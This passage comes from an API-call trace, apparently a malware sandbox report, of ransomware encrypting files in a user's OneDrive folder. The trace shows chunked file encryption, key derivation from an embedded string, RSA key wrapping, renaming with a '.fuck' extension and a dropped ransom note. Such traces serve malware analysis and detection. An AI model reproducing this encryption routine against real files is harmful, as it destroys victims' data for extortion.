pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.599] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.599] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.599] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.600] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.600] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.600] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.600] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.600] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.600] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.600] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.601] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0278.601] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x250, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0278.601] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0278.601] CloseHandle (hObject=0x5d3c) returned 1 [0278.601] CloseHandle (hObject=0x5d48) returned 1 [0278.601] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\it\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\it\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0278.610] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0278.610] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\it\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0278.620] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\it\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\it\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0278.622] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0278.622] CryptDestroyKey (hKey=0x2fb688) returned 1 [0278.622] CryptReleaseContext (hProv=0x2f2d600, dwFlags=0x0) returned 1 [0278.622] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0278.622] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0278.623] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\it\\readme_back_files.htm")) returned 0xffffffff [0278.623] AreFileApisANSI () returned 1 [0278.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28896f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0278.623] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0278.624] GetFileType (hFile=0x5d4c) returned 0x1 [0278.624] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0278.625] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0278.625] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa6c8 [0278.626] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0278.626] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0278.626] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0278.626] GetLastError () returned 0x0 [0278.626] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ja\\filesync.localizedresources.dll.mui")) returned 0x20 [0278.626] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0278.626] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ja\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0278.627] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ja\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0278.628] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ja\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0278.629] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2d1c0) returned 1 [0278.633] CryptCreateHash (in: hProv=0x2f2d1c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0278.633] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0278.633] CryptHashData (hHash=0x2fa748, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0278.633] CryptDeriveKey (in: hProv=0x2f2d1c0, Algid=0x6610, hBaseData=0x2fa748, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0278.633] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0278.633] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0278.633] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2dce8) returned 1 [0278.634] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2dce8, dwCertEncodingType=0x1, pInfo=0x2f36ae0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36b10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36b18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbfc8) returned 1 [0278.634] CryptEncrypt (in: hKey=0x2fbfc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0278.634] CryptEncrypt (in: hKey=0x2fbfc8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2dac8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2dac8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0278.634] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2dac8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2dac8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0278.635] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.640] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.640] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.645] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.646] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.646] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.646] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.646] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.646] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.679] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.679] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.679] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.680] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.680] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.680] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.680] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.680] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.680] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.681] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.681] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.681] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.681] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.681] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.681] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.682] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.682] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.682] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5c598, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.682] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5c598*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.682] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5c598*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5c598*, 